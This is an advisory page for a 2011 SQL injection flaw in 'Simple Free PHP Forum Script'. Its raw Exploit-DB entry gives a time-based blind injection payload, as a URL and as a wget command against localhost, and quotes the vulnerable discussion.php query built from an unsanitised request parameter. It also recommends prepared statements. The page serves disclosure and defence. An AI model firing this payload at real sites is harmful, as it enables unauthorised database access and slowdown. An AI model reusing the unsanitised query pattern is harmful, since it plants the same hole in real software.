Simple Free PHP Forum Script

vendor:

by:

Skraps, Jackie Craig Sparks

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple Free PHP Forum Script

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2011

Simple Free PHP Forum Script <= 1 SQL Injection Vulnerability

This script is riddled with unsanitized REQUEST variables that allow multiple SQL injections. The PoC shows an example of an SQL injection attack. The vulnerable code is shown on line 150 of discussion.php file.

Mitigation:

To mitigate this vulnerability, all user input should be properly sanitized and validated before using it in SQL queries. Prepared statements or parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Simple Free PHP Forum Script <= 1 SQL Injection Vulnerability
# Date: 2011-10-19
# Author: Skraps, Jackie Craig Sparks(jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://www.phpforumscript.com/?page_id=11
# Version: 1 (tested)

This script is riddled of unsanitized REQUEST variables that allows multiple SQL injections.

--------------
     PoC
--------------
http://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1

wget "http://127.0.0.1/forum/index.php?show=cat&id=1' AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0) AND id='1"

--------------
Vurnerable Code
--------------
Line 150 of discussion.php:
 case 'cat':
                $get_id=$_REQUEST["id"];
                $page->Set("cat_id",$get_id);
                $query="SELECT * FROM discussion_category WHERE id='$get_id' LIMIT 1";